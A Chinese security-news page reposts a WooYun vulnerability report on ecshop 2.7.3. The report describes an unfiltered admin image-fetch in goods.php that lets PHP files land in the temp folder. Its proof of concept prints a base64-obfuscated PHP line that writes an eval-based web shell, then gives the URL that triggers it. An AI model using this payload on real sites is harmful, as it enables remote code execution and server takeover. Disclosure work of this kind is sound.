热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

ecshop 2.7.3 后台过滤不严可获取shell

发布时间:2014-02-24 09:56文章来源:wooyun文章作者:Fixw 点击次数:
摘要:漏洞作者: Fixw 提交时间: 2013-11-25 13:47 公开时间: 2014-02-23 13:48 漏洞类型: 文件上传导致任意代码执行 简要描述: ecshop后台过滤不严可以上传php文件。。。。 详细说明: 问题出现在后台引用外部url图片时没有过滤文件格式,在/admin/goods.php...

漏洞作者: Fixw

提交时间: 2013-11-25 13:47
公开时间: 2014-02-23 13:48

漏洞类型: 文件上传导致任意代码执行
简要描述:

ecshop后台过滤不严可以上传php文件。。。。


详细说明:

问题出现在后台引用外部url图片时没有过滤文件格式,在/admin/goods.php第638行 ,

 

ecshop 2.7.3 后台过滤不严可获取shell

 

直接复制文件到temp文件夹下并且保留了原文件名,导致漏洞产生。
漏洞证明:

证明如下:

web1站点1.php文件内容

 

<?php fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbY10pPz4)); ?>

 

 

ecshop 2.7.3 后台过滤不严可获取shell
ecshop 2.7.3 后台过滤不严可获取shell

 

 

 

访问 http://www.yunsec.net/temp/1.php 后即可生成shell

 

 

ecshop 2.7.3 后台过滤不严可获取shell

 

 

标签分类:

上一篇:杰奇CMS 1.7商业版注入漏洞
下一篇:ThinkSNS 文件包含getshell一枚